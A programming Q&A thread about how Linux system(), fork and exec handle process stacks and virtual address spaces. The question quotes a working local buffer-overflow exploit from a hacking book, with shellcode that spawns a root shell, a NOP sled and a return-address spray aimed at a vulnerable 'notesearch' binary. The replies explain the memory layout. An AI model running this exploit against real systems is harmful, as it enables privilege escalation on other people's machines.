# System function and stack

Tags: c, linux, stack, buffer-overflow

I have a question about the Linux system call System() and the stack.
Let us suppose that we have:

```
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char* argv[]) {
   char buff[] = "/usr/bin/ls"
   system(buff);
   return 0;
}
```

Now, since the system() function makes a fork() and then an execl(), my question is: the stack of the new process is placed near to the the one of the above main(), or it can be everywhere in the memory?
More generally: in this trivial example, what happens to the main() stack?

Furthermore, what if the main() is:

```
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char* argv[]) {
   char buff[] = "/usr/bin/ls"
   execl(buff, 0);
   return 0;
}
```

In this case, since no fork() is called, the stack of the function execl() should be regularly placed immediately above the one of the main(), right?

Edit:
If the virtual address space is different between the main and the process executed by a system(), why this should work:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
  unsigned int i, *ptr, ret, offset=270;
  char *command, *buffer;
  command = (char *) malloc(200);
  bzero(command, 200); // Zero out the new memory.

  strcpy(command, "./notesearch \'"); // Start command buffer.
  buffer = command + strlen(command); // Set buffer at the end.

  if(argc > 1) // Set offset.
     offset = atoi(argv[1]);

  ret = (unsigned int) &i - offset; // Set return address.

  for(i=0; i < 160; i+=4) // Fill buffer with return address.
     *((unsigned int *)(buffer+i)) = ret;

  memset(buffer, 0x90, 60); // Build NOP sled.
  memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

  strcat(command, "\'");

  system(command); // Run exploit.
  free(command);
}
```

I found it on a book that I'm reading about the hacking. This piece of code merely is an exploit of a buffer overflow. It's purpose is to run a program bof vulnerable with an ad-hoc argument which is able to exploit the bof, and to run the shellcode.

The address of the shellcode injected in the new process, is obtained using the address of a local variable (unisgned int i in the example) as base, and an offset. But this should work ONLY if the virtual address space of the two processes is the same right?

Comment: On modern systems with virtual memory, after `fork()` the stack address can be anywhere, and may even overlap with those of the parent process.

Comment: [system(3)](http://www.kernel.org/doc/man-pages/online/pages/man3/system.3.html) is not a *system call* which are listed in [syscalls(2)](http://man7.org/linux/man-pages/man2/syscalls.2.html). The `system` library function uses `fork` and `execve` syscalls (and `/bin/sh -c`)

Answer (score 4, accepted):

When you use `exec`, all the memory of the process is replaced.  The stack, the heap, everything.  The original stack that contained `buff` no longer exists.

A `system` call consists of a `fork` and an `exec`.  A `fork` creates a new process which is a copy of the original.  The `exec` then replaces the memory of the new process.

When an `exec` is used, a new process address space is created.  This address space is assembled from various free blocks of memory that are managed by the kernel.  This is a new virtual address space.  The relationship of the physical memory of the new process to the old process is just whatever the kernel decides.  But since the new address space is virtual, it has no relation to the parent process's address space.  Even if you knew the address of `buff` in the parent process and could pass that address to the child process, this address would have no meaning to the child process.

Comment: Thanks for the response. It was also my opinion, but I found on a book the piece of code that I added in the question, how that should work?

Comment: @badnack: `buff` is copied into the new process.

Comment: Yes but the address of the variable i makes sense only in the main(), why it is used to point to the shellcode when it is injected? The address of the shellcode in the stack of new process should be very different, right?

Comment: @badnack: When using execl, the address of `buff` gets passed to the kernel.  The kernel can copy `buff` into its own address space before replacing the memory of the process.

Comment: Maybe it's my fault, but I really do not understand. I agreed that the addresses are different (it makes completely sense to me). The only doubt that I have is about the variable i, whose address (taken in the process main()), is used to point to the shellcode when it will be in the stack of the new process. look at the variable i, and how it is used.

Comment: @badnack: This is relying on the stack frame of `main` in the child process having the same virtual address as the stack frame of `main` in the parent process.  They don't have the same physical address though.  The exploit just needs to know where the beginning of the stack frame will be so that it can corrupt it.  It is the child process that will be affected, not the parent process.

Comment: Ok thanks, now I got it. I just thought the also the virtual addresses were different. If they are equal, the whole code makes sense. Thanks a lot.